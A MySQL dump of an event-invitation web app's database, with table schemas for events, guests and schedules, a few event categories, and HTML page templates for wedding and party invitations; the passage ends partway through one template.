-- MySQL dump 10.13  Distrib 5.7.17, for Win64 (x86_64)
--
-- Host: localhost    Database: event
-- ------------------------------------------------------
-- Server version	5.7.20-log

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `event`
--

DROP TABLE IF EXISTS `event`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `event` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `nama` varchar(200) NOT NULL,
  `quote` text,
  `author` text,
  `background_home_1` text,
  `background_home_2` text,
  `background_schedule` text,
  `backgorund_quotes` text,
  `background_ending` text,
  `users_id` int(11) NOT NULL,
  `template_design_id` int(11) DEFAULT NULL,
  `created_at` datetime DEFAULT NULL,
  `updated_at` datetime DEFAULT NULL,
  `deleted_at` datetime DEFAULT NULL,
  `link_url` varchar(200) DEFAULT NULL,
  `publish` tinyint(4) DEFAULT NULL,
  `event_category_id` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `fk_event_users_idx` (`users_id`),
  KEY `fk_event_template_design1_idx` (`template_design_id`),
  KEY `fk_event_event_category1_idx` (`event_category_id`),
  CONSTRAINT `fk_event_event_category1` FOREIGN KEY (`event_category_id`) REFERENCES `event_category` (`id`) ON DELETE NO ACTION ON UPDATE NO ACTION,
  CONSTRAINT `fk_event_template_design1` FOREIGN KEY (`template_design_id`) REFERENCES `template_design` (`id`) ON DELETE NO ACTION ON UPDATE NO ACTION,
  CONSTRAINT `fk_event_users` FOREIGN KEY (`users_id`) REFERENCES `users` (`id`) ON DELETE NO ACTION ON UPDATE NO ACTION
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `event`
--

LOCK TABLES `event` WRITE;
/*!40000 ALTER TABLE `event` DISABLE KEYS */;
/*!40000 ALTER TABLE `event` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `event_category`
--

DROP TABLE IF EXISTS `event_category`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `event_category` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `nama` varchar(100) DEFAULT NULL,
  `keterangan` text,
  `created_at` datetime DEFAULT NULL,
  `updated_at` datetime DEFAULT NULL,
  `deleted_at` datetime DEFAULT NULL,
  `link_url` varchar(200) DEFAULT NULL,
  `publish` tinyint(4) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=9 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `event_category`
--

LOCK TABLES `event_category` WRITE;
/*!40000 ALTER TABLE `event_category` DISABLE KEYS */;
INSERT INTO `event_category` VALUES (4,'Wedding','Wedding Party Event','2018-01-01 00:00:00','2018-08-30 09:33:16',NULL,'wedding',1),(5,'Birthday Party','Birthday Party Birthday Party','2018-01-01 00:00:00','2018-09-04 09:22:04',NULL,'birthday_party',1),(6,'Birthday Dinner','Birthday Dinner','2018-08-30 08:26:11','2018-08-30 08:26:11',NULL,'birthday_dinner',1),(7,'Meeting Company','Meeting Company','2018-08-30 09:23:57','2018-08-30 09:23:57',NULL,'meeting_company',1),(8,'Sunatan','Sunatan Party Together','2018-08-30 10:00:03','2018-08-30 10:03:15',NULL,'sunatan',1);
/*!40000 ALTER TABLE `event_category` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `event_design`
--

DROP TABLE IF EXISTS `event_design`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `event_design` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `template_design_detail_id` int(11) NOT NULL,
  `event_id` int(11) NOT NULL,
  `value` text,
  PRIMARY KEY (`id`),
  KEY `fk_event_design_template_design_detail1_idx` (`template_design_detail_id`),
  KEY `fk_event_design_event1_idx` (`event_id`),
  CONSTRAINT `fk_event_design_event1` FOREIGN KEY (`event_id`) REFERENCES `event` (`id`) ON DELETE NO ACTION ON UPDATE NO ACTION,
  CONSTRAINT `fk_event_design_template_design_detail1` FOREIGN KEY (`template_design_detail_id`) REFERENCES `template_design_detail` (`id`) ON DELETE NO ACTION ON UPDATE NO ACTION
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `event_design`
--

LOCK TABLES `event_design` WRITE;
/*!40000 ALTER TABLE `event_design` DISABLE KEYS */;
/*!40000 ALTER TABLE `event_design` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `event_detail`
--

DROP TABLE IF EXISTS `event_detail`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `event_detail` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `event_id` int(11) NOT NULL,
  `nama_pria` varchar(200) DEFAULT NULL,
  `nama_wanita` varchar(200) DEFAULT NULL,
  `nama_acara` varchar(200) DEFAULT NULL,
  `judul_cerita` text,
  `cerita_awal` text,
  `cerita_tengah` text,
  `cerita_akhir` text,
  `created_at` datetime DEFAULT NULL,
  `updated_at` datetime DEFAULT NULL,
  `deleted_at` datetime DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `fk_event_detail_event1_idx` (`event_id`),
  CONSTRAINT `fk_event_detail_event1` FOREIGN KEY (`event_id`) REFERENCES `event` (`id`) ON DELETE NO ACTION ON UPDATE NO ACTION
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `event_detail`
--

LOCK TABLES `event_detail` WRITE;
/*!40000 ALTER TABLE `event_detail` DISABLE KEYS */;
/*!40000 ALTER TABLE `event_detail` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `event_image`
--

DROP TABLE IF EXISTS `event_image`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `event_image` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `gambar` text,
  `event_id` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `fk_event_image_event1_idx` (`event_id`),
  CONSTRAINT `fk_event_image_event1` FOREIGN KEY (`event_id`) REFERENCES `event` (`id`) ON DELETE NO ACTION ON UPDATE NO ACTION
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `event_image`
--

LOCK TABLES `event_image` WRITE;
/*!40000 ALTER TABLE `event_image` DISABLE KEYS */;
/*!40000 ALTER TABLE `event_image` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `event_schedule`
--

DROP TABLE IF EXISTS `event_schedule`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `event_schedule` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `judul` text,
  `tempat` text,
  `kota` varchar(200) DEFAULT NULL,
  `negara` varchar(200) DEFAULT NULL,
  `telepon` varchar(45) DEFAULT NULL,
  `jam_mulai` datetime DEFAULT NULL,
  `jam_selesai` datetime DEFAULT NULL,
  `utama` int(11) DEFAULT NULL,
  `gambar` text,
  `latiitude` decimal(14,8) DEFAULT NULL,
  `longitude` decimal(14,8) DEFAULT NULL,
  `dresscode` varchar(45) DEFAULT NULL,
  `dresscode_detail` varchar(45) DEFAULT NULL,
  `gift` varchar(45) DEFAULT NULL,
  `gift_detail` varchar(45) DEFAULT NULL,
  `event_id` int(11) NOT NULL,
  `created_at` datetime DEFAULT NULL,
  `updated_at` datetime DEFAULT NULL,
  `deleted_at` datetime DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `fk_event_schedule_event1_idx` (`event_id`),
  CONSTRAINT `fk_event_schedule_event1` FOREIGN KEY (`event_id`) REFERENCES `event` (`id`) ON DELETE NO ACTION ON UPDATE NO ACTION
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `event_schedule`
--

LOCK TABLES `event_schedule` WRITE;
/*!40000 ALTER TABLE `event_schedule` DISABLE KEYS */;
/*!40000 ALTER TABLE `event_schedule` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `guest`
--

DROP TABLE IF EXISTS `guest`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `guest` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `nama` varchar(200) NOT NULL,
  `alamat` text NOT NULL,
  `telepon` varchar(45) DEFAULT NULL,
  `email` varchar(200) DEFAULT NULL,
  `whatsapp` varchar(200) DEFAULT NULL,
  `line` varchar(200) DEFAULT NULL,
  `jenis` int(11) DEFAULT NULL,
  `kehadiran` int(11) DEFAULT NULL,
  `qrcode` text,
  `created_at` datetime DEFAULT NULL,
  `updated_at` datetime DEFAULT NULL,
  `deleted_at` datetime DEFAULT NULL,
  `event_id` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `fk_guest_event1_idx` (`event_id`),
  CONSTRAINT `fk_guest_event1` FOREIGN KEY (`event_id`) REFERENCES `event` (`id`) ON DELETE NO ACTION ON UPDATE NO ACTION
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `guest`
--

LOCK TABLES `guest` WRITE;
/*!40000 ALTER TABLE `guest` DISABLE KEYS */;
/*!40000 ALTER TABLE `guest` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `template_design`
--

DROP TABLE IF EXISTS `template_design`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `template_design` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `nama` varchar(100) DEFAULT NULL,
  `imgpreview` text,
  `html` longtext,
  `created_at` datetime DEFAULT NULL,
  `updated_at` datetime DEFAULT NULL,
  `deleted_at` datetime DEFAULT NULL,
  `event_category_id` int(11) NOT NULL,
  `link_url` varchar(200) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `fk_template_design_event_category1_idx` (`event_category_id`),
  CONSTRAINT `fk_template_design_event_category1` FOREIGN KEY (`event_category_id`) REFERENCES `event_category` (`id`) ON DELETE NO ACTION ON UPDATE NO ACTION
) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `template_design`
--

LOCK TABLES `template_design` WRITE;
/*!40000 ALTER TABLE `template_design` DISABLE KEYS */;
INSERT INTO `template_design` VALUES (1,'Parallax','template/1/WtuWbidcZtk4Wuu71N3MFn9ZXAObvkni9XIopA3n.jpeg','<div class=\"gla_slider gla_image_bck gla_wht_txt gla_fixed\"  data-image=\"~*01*~\" data-stellar-background-ratio=\"0.8\">\n    <div class=\"gla_over\" data-color=\"#9abab6\" data-opacity=\"0.2\"></div>\n    <div class=\"container\">\n      <div class=\"gla_slide_txt gla_slide_center_bottom text-center\">\n        <div class=\"gla_slide_midtitle\">~*02*~</div>\n        <div class=\"gla_slide_subtitle\">~*03*~</div>\n      </div>\n    </div>\n    <a class=\"gla_scroll_down gla_go\" href=\"#gla_content\">\n    <b></b>\n    Scroll\n    </a>\n  </div>\n  <section id=\"gla_content\" class=\"gla_content\">\n    <section class=\"gla_section gla_image_bck gla_wht_txt gla_fixed\" data-stellar-background-ratio=\"0.4\" data-image=\"~*04*~\">\n      <div class=\"gla_over\" data-color=\"#282828\" data-opacity=\"0.4\"></div>\n      <div class=\"container text-left\">\n        <div class=\"row\">\n          <div class=\"col-md-6 col-sm-12\">\n            <h2>~*05*~</h2>\n            <h3 class=\"gla_subtitle\">~*06*~</h3>\n            <p>~*07*~</p>\n          </div>\n        </div>\n      </div>\n    </section>\n    <section class=\"gla_section gla_image_bck gla_wht_txt gla_fixed\" data-stellar-background-ratio=\"0.4\" data-image=\"~*08*~\">\n      <div class=\"gla_over\" data-color=\"#282828\" data-opacity=\"0.4\"></div>\n      <div class=\"container text-right\">\n        <p><img src=\"~*09*~\" data-bottom-top=\"@src:~*09*~\" height=\"150\" alt=\"\"></p>\n        <h2>~*10*~</h2>\n        <h3 class=\"gla_subtitle\">~*11*~</h3>\n        <div class=\"gla_countdown\" data-year=\"~*12*~\" data-month=\"~*13*~\" data-day=\"~*14*~\"></div>\n      </div>\n    </section>\n    <section class=\"gla_section gla_image_bck gla_wht_txt gla_fixed\" data-stellar-background-ratio=\"0.4\" data-image=\"~*15*~\">\n      <div class=\"gla_over\" data-color=\"#282828\" data-opacity=\"0.4\"></div>\n      <div class=\"container text-left\">\n        <p><img src=\"~*16*~\" data-bottom-top=\"@src:~*16*~\" height=\"150\" alt=\"\"></p>\n        <h3>~*17*~</h3>\n        <p class=\"gla_subtitle\">~*18*~</p>\n      </div>\n    </section>\n    <section class=\"gla_section gla_image_bck gla_wht_txt gla_fixed\" data-stellar-background-ratio=\"0.4\" data-image=\"~*19*~\">\n      <div class=\"gla_over\" data-color=\"#282828\" data-opacity=\"0.4\"></div>\n      <div class=\"container text-center\">\n        <p><img src=\"~*20*~\" alt=\"\" height=\"200\" data-bottom-top=\"@src:~*20*~\"></p>\n      </div>\n    </section>\n  </section>\n','2018-08-08 15:00:00','2018-08-08 09:32:00',NULL,5,'parallax'),(2,'Landing','template/2/pm6AsGk3ErxvyGjGOXJhvMk5lGO2No7AfTGsXAfh.jpeg','<div class=\"gla_slider gla_image_bck  gla_wht_txt gla_fixed\"  data-image=\"~*01*~\" data-stellar-background-ratio=\"0.4\">\n    <div class=\"gla_over\" data-color=\"#282828\" data-opacity=\"0.5\"></div>\n    <div class=\"container\">\n        <div class=\"gla_slide_txt gla_slide_center_bottom text-center\">\n            <p><img src=\"~*02*~\"  alt=\"\" height=\"350\"></p>\n        </div>\n    </div>\n    <a class=\"gla_scroll_down gla_go\" href=\"#gla_content\">\n        <b></b>\n        Scroll\n    </a>\n</div>\n\n<section id=\"gla_content\" class=\"gla_content\">\n    <section class=\"gla_section\">\n        <div class=\"container text-center\">\n            <div class=\"row text-center\">\n                <div class=\"col-md-4 gla_round_block\">\n                    <div class=\"gla_round_im gla_image_bck\" data-image=\"~*03*~\"></div>\n                    <h3>~*04*~</h3>\n                </div>\n                <div class=\"col-md-4 gla_round_block\">\n                    <p><img src=\"~*05*~\" data-bottom-top=\"@src:~*05*~\" height=\"150\" alt=\"\"></p>\n                    <h3>~*06*~<br> ~*07*~</h3>\n                    ~*08*~\n                </div>\n                <div class=\"col-md-4 gla_round_block\">\n                    <div class=\"gla_round_im gla_image_bck\" data-image=\"~*09*~\"></div>\n                    <h3>~*10*~</h3>\n                </div>\n            </div>\n            <div class=\"gla_countdown\" data-year=\"~*11*~\" data-month=\"~*12*~\" data-day=\"~*13*~\"></div>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck\" data-color=\"#ecf2f0\">\n        <div class=\"container\">\n            <div class=\"row gla_auto_height\">\n                <div class=\"col-md-6 gla_image_bck\" data-color=\"#fff\">\n                    <div class=\"gla_simple_block\">\n                        <h2>~*14*~</h2>\n                        <p>~*15*~</p>\n                        <div class=\"gla_footer_social\">\n                            <a href=\"#\"><i class=\"ti ti-facebook gla_icon_box\"></i></a>\n                            <a href=\"#\"><i class=\"ti ti-instagram gla_icon_box\"></i></a>\n                            <a href=\"#\"><i class=\"ti ti-google gla_icon_box\"></i></a>\n                        </div>\n                    </div>\n                </div>\n                <div class=\"col-md-6 gla_image_bck\" data-image=\"~*16*~\">\n                </div>\n                <div class=\"col-md-6 col-md-push-6 gla_image_bck\" data-color=\"#fff\">\n                    <div class=\"gla_simple_block\">\n                        <h2>~*17*~</h2>\n                        <p>~*18*~</p>\n                        <div class=\"gla_footer_social\">\n                            <a href=\"\"><i class=\"ti ti-facebook gla_icon_box\"></i></a>\n                            <a href=\"\"><i class=\"ti ti-instagram gla_icon_box\"></i></a>\n                            <a href=\"\"><i class=\"ti ti-google gla_icon_box\"></i></a>\n                        </div>\n                    </div>\n                </div>\n                <div class=\"col-md-6 col-md-pull-6 gla_image_bck\" data-image=\"~*19*~\">\n                </div>\n            </div>\n        </div>\n    </section>\n\n    <section class=\"gla_section\">\n        <div class=\"container text-center\">\n            <h2>When & Where</h2>\n            <div class=\"gla_icon_boxes row text-left\">\n                ~*20*~\n            </div>\n        </div>\n    </section>\n\n    <section class=\"gla_section\">\n        <div class=\"gla_map\">\n            <iframe src=\"~*26*~\" width=\"100%\" height=\"480\"></iframe>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck gla_wht_txt gla_fixed\" data-stellar-background-ratio=\"0.8\" data-image=\"images/wedding/carita_lee/15320532559_ee3e0d021d_k.jpg\">\n        <div class=\"gla_over\" data-color=\"#282828\" data-opacity=\"0.8\"></div>\n        <div class=\"container text-center\">\n            <h2>Will You Attend?</h2>\n            <h3 class=\"gla_subtitle\">Please sign your RSVP</h3>\n            <div class=\"row\">\n                <div class=\"col-md-8 col-md-push-2\">\n                    <form action=\"https://formspree.io/your@mail.com\" method=\"POST\">\n                        <div class=\"row\">\n                            <div class=\"col-md-6\">\n                                <label>Your name*</label>\n                                <input type=\"text\" name=\"name\" class=\"form-control form-opacity\">\n                            </div>\n                            <div class=\"col-md-6\">\n                                <label>Your e-mail*</label>\n                                <input type=\"text\" name=\"email\" class=\"form-control form-opacity\">\n                            </div>\n\n                            <div class=\"col-md-6\">\n                                <label>Will you attend?</label>\n                                <input type=\"radio\" name=\"attend\" value=\"Yes, I will be there\">\n                                <span>Yes, I will be there</span><br>\n                                <input type=\"radio\" name=\"attend\" value=\"Sorry, I can\'t come\">\n                                <span>Sorry, I can\'t come</span>\n                            </div>\n                            <div class=\"col-md-6\">\n                                <label>Meal preference</label>\n                                <select name=\"meal\" class=\"form-control form-opacity\">\n                                    <option value=\"I eat anything\">I eat anything</option>\n                                    <option value=\"Beef\">Beef</option>\n                                    <option value=\"Chicken\">Chicken</option>\n                                    <option value=\"Vegetarian\">Vegetarian</option>\n                                </select>\n                            </div>\n                            <div class=\"col-md-12\">\n                                <label>Notes</label>\n                                <textarea name=\"message\" class=\"form-control form-opacity\"></textarea>\n                            </div>\n                            <div class=\"col-md-12\">\n                                <input type=\"submit\" class=\"btn submit\" value=\"Send\">\n                            </div>\n                        </div>\n                    </form>\n                </div>\n            </div>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck\" data-color=\"#fff\">\n        <div class=\"container text-center\">\n            <h2>~*27*~</h2>\n            <div class=\"row text-center\">\n                <div class=\"col-md-3 gla_round_block\">\n                    <div class=\"gla_round_im gla_image_bck\" data-image=\"~*28*~\"></div>\n                    <h4>~*29*~</h4>\n                </div>\n                <div class=\"col-md-3 gla_round_block\">\n                    <div class=\"gla_round_im gla_image_bck\" data-image=\"~*30*~\"></div>\n                    <h4>~*31*~</h4>\n                </div>\n                <div class=\"col-md-3 gla_round_block\">\n                    <div class=\"gla_round_im gla_image_bck\" data-image=\"~*32*~\"></div>\n                    <h4>~*33*~</h4>\n                </div>\n                <div class=\"col-md-3 gla_round_block\">\n                    <div class=\"gla_round_im gla_image_bck\" data-image=\"~*34*~\"></div>\n                    <h4>~*35*~</h4>\n                </div>\n            </div>\n        </div>\n    </section>\n\n    <section class=\"gla_section gla_image_bck gla_fixed gla_wht_txt\" data-stellar-background-ratio=\"0.8\" data-image=\"~*36*~\">\n        <div class=\"gla_over\" data-color=\"#282828\" data-opacity=\"0.4\"></div>\n        <div class=\"container text-center\">\n            <p><img src=\"~*37*~\" data-bottom-top=\"@src:~*37*~\" height=\"150\" alt=\"\"></p>\n            <h3>~*38*~</h3>\n            <p class=\"gla_subtitle\">— ~*39*~</p>\n        </div>\n    </section>\n</section>\n','2018-08-08 15:00:00','2018-08-08 09:33:01',NULL,4,'landing'),(3,'Abstract Flower','template/3/4Nw1NRP6nZnnpJ53Jwe26KxlYmd4q6q24mIT7VB7.jpeg','<div class=\"gla_slider gla_image_bck gla_fixed\" data-stellar-background-ratio=\"0.2\" data-color=\"#efe5dd\">\n    <div class=\"gla_slider_flower\">\n         <div class=\"gla_slider_flower_c1 gla_slider_flower_item\" data-start=\"top:0px; left:0px\" data-200-start=\"top:-300px; left:-300px\"></div>\n        <div class=\"gla_slider_flower_c2 gla_slider_flower_item\" data-start=\"top:0px; right:0px\" data-200-start=\"top:-300px; right:-300px\"></div>\n        <div class=\"gla_slider_flower_c3 gla_slider_flower_item\" data-start=\"bottom:0px; right:0px\" data-200-start=\"bottom:-300px; right:-300px\"></div>\n        <div class=\"gla_slider_flower_c4 gla_slider_flower_item\" data-start=\"bottom:0px; left:0px\" data-200-start=\"bottom:-300px; left:-300px\"></div>\n        <div class=\"gla_slider_flower_c5 gla_slider_flower_item\" data-start=\"top:0px; left:50%\" data-200-start=\"top:-300px; left:50%\"></div>\n        <div class=\"gla_slider_flower_c6 gla_slider_flower_item\" data-start=\"bottom:0px; left:50%\" data-200-start=\"bottom:-300px; left:50%\"></div>\n    </div>\n\n    <!-- Over -->\n    <div class=\"gla_over\" data-color=\"#9abab6\" data-opacity=\"0\"></div>\n\n    <div class=\"container\">\n        <!-- Slider Texts -->\n        <div class=\"gla_slide_txt gla_slide_center_middle text-center\">\n            <div class=\"gla_slide_midtitle\">~*01*~<br>~*02*~</div>\n        </div>\n        <!-- Slider Texts End -->\n    </div>\n    <!-- container end -->\n\n    <!-- Slide Down -->\n    <a class=\"gla_scroll_down gla_go\" href=\"#gla_content\">\n        <b></b>\n        Scroll\n    </a>\n</div>\n\n<section id=\"gla_content\" class=\"gla_content\">\n    <!-- section -->\n    <section class=\"gla_section gla_lg_padding gla_image_bck gla_fixed gla_wht_txt\" data-stellar-background-ratio=\"0.2\" data-image=\"~*03*~\">\n         <div class=\"gla_slider_flower\" data-bottom-top=\"@class:active\" data--200-bottom=\"@class:no_active\">\n            <div class=\"gla_slider_flower_c1 gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c2 gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c3 gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c4 gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c5 gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c6 gla_slider_flower_item\"></div>\n        </div>\n        <div class=\"container text-center\">\n            <p><img src=\"~*04*~\" data-bottom-top=\"@src:~*04*~\" height=\"150\" alt=\"\"></p>\n            <h2>~*05*~</h2>\n            <p>~*06*~</p>\n        </div>\n        <!-- container end -->\n    </section>\n    <!-- section end -->\n\n    <!-- section -->\n    <section class=\"gla_section gla_image_bck gla_fixed\" data-stellar-background-ratio=\"0.2\" data-color=\"#fff\">\n        <div class=\"container text-center\">\n            <p><img src=\"~*07*~\" data-bottom-top=\"@src:~*07*~\" height=\"150\" alt=\"\"></p>\n            <h2>~*02*~</h2>\n            <h3 class=\"gla_subtitle\">~*08*~<br>~*09*~</h3>\n            <div class=\"gla_countdown\" data-year=\"~*10*~\" data-month=\"~*11*~\" data-day=\"~*12*~\"></div>\n        </div>\n        <!-- container end -->\n    </section>\n    <!-- section end -->\n\n    <!-- section -->\n    <section class=\"gla_section gla_lg_padding gla_image_bck\" data-color=\"#efe5dd\">\n        <div class=\"gla_slider_flower\" data-bottom-top=\"@class:active\" data--200-bottom=\"@class:no_active\">\n             <div class=\"gla_slider_flower_c1 gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c2 gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c3 gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c4 gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c5 gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c6 gla_slider_flower_item\"></div>\n        </div>\n        <div class=\"container text-center\">\n            <p><img src=\"~*13*~\" data-bottom-top=\"@src:~*13*~\" height=\"150\" alt=\"\"></p>\n            <div class=\"gla_slide_midtitle\">~*14*~</div>\n            <p>~*15*~</p>\n            <p><a href=\"#\" class=\"btn\">~*16*~</a></p>\n        </div>\n        <!-- container end -->\n    </section>\n    <!-- section end -->\n\n    <!-- section -->\n    <section class=\"gla_section gla_image_bck gla_wht_txt gla_fixed\" data-stellar-background-ratio=\"0.8\" data-image=\"~*17*~\">\n        <!-- Over -->\n        <div class=\"gla_over\" data-color=\"#1e1d2d\" data-opacity=\"0.4\"></div>\n        <div class=\"container text-center\">\n            <h2>~*18*~</h2>\n            <p>~*19*~</p>\n        </div>\n        <!-- container end -->\n    </section>\n    <!-- section end -->\n\n    <!-- section -->\n    <section class=\"gla_section gla_image_bck\">\n        <div class=\"container text-center\">\n            <h2>~*20*~</h2>\n            <p>~*21*~</p>\n\n            <!-- grid -->\n            <div class=\"gla_portfolio_no_padding grid\">\n                ~*22*~\n             </div>\n             <!-- grid end -->\n\n        </div>\n        <!-- container end -->\n\n    </section>\n    <!-- section end -->\n\n    <!-- section -->\n    <section class=\"gla_section gla_image_bck gla_fixed gla_wht_txt\" data-stellar-background-ratio=\"0.2\" data-image=\"~*23*~\">\n\n        <!-- Over -->\n        <div class=\"gla_over\" data-color=\"#000\" data-opacity=\"0.4\"></div>\n\n        <div class=\"container text-center\">\n            <p><img src=\"~*24*~\" alt=\"\" height=\"200\" data-bottom-top=\"@src:~*24*~\"></p>\n        </div>\n        <!-- container end -->\n\n    </section>\n    <!-- section end -->\n\n</section>\n','2018-08-08 15:00:00','2018-08-08 09:42:49',NULL,5,'abstract-flower'),(4,'Simple Flower','template/4/4qAIRggf4gOsFMJ5rmOr4LpzHdgS1cC4Cy6q6qi8.jpeg','<div class=\"gla_slider gla_image_bck gla_fixed\" data-color=\"#fbf5ee\">\n    <div class=\"gla_slider_flower\">\n         <div class=\"gla_slider_flower_c1 gla_slider_flower_iii gla_slider_flower_item\" data-start=\"top:0px; left:0px\" data-200-start=\"top:-300px; left:-300px\"></div>\n        <div class=\"gla_slider_flower_c2 gla_slider_flower_iii gla_slider_flower_item\" data-start=\"top:0px; right:0px\" data-200-start=\"top:-300px; right:-300px\"></div>\n        <div class=\"gla_slider_flower_c3 gla_slider_flower_iii gla_slider_flower_item\" data-start=\"bottom:0px; right:0px\" data-200-start=\"bottom:-300px; right:-300px\"></div>\n        <div class=\"gla_slider_flower_c4 gla_slider_flower_iii gla_slider_flower_item\" data-start=\"bottom:0px; left:0px\" data-200-start=\"bottom:-300px; left:-300px\"></div>\n        <div class=\"gla_slider_flower_c5 gla_slider_flower_iii gla_slider_flower_item\" data-start=\"top:0px; left:50%\" data-200-start=\"top:-300px; left:50%\"></div>\n        <div class=\"gla_slider_flower_c6 gla_slider_flower_iii gla_slider_flower_item\" data-start=\"bottom:0px; left:50%\" data-200-start=\"bottom:-300px; left:50%\"></div>\n    </div>\n    <div class=\"gla_over\" data-color=\"#1e1d2d\" data-opacity=\"0\"></div>\n    <div class=\"container\">\n        <div class=\"gla_slide_txt gla_slide_center_middle text-center\">\n            <div class=\"gla_slide_midtitle\">~*01*~<br>~*02*~</div>\n        </div>\n    </div>\n</div>\n\n<section id=\"gla_content\" class=\"gla_content\">\n    <section class=\"gla_section gla_lg_padding gla_image_bck gla_fixed gla_wht_txt\" data-stellar-background-ratio=\"0.2\" data-image=\"~*03*~\">\n         <div class=\"gla_slider_flower\" data-bottom-top=\"@class:gla_slider_flower active\" data--200-bottom=\"@class:gla_slider_flower no_active\">\n            <div class=\"gla_slider_flower_c1 gla_slider_flower_iii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c2 gla_slider_flower_iii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c3 gla_slider_flower_iii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c4 gla_slider_flower_iii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c5 gla_slider_flower_iii gla_slider_flower_item\"></div>\n            <div class=\"gla_slider_flower_c6 gla_slider_flower_iii gla_slider_flower_item\"></div>\n        </div>\n        <div class=\"gla_over\" data-color=\"#000\" data-opacity=\"0.3\"></div>\n        <div class=\"container text-center\">\n            <p><img src=\"~*04*~ images/animations/savethedate_wh.gif\" data-bottom-top=\"@src:~*04*~\" height=\"150\" alt=\"\"></p>\n            <h2>~*05*~</h2>\n            <h3 class=\"gla_subtitle\">~*06*~<br>~*07*~</h3>\n            <div class=\"gla_countdown\" data-year=\"~*08*~\" data-month=\"~*09*~\" data-day=\"~*10*~\"></div>\n        </div>\n    </section>\n    <section class=\"gla_section gla_lg_padding\">\n        <div class=\"gla_slider_flower\" 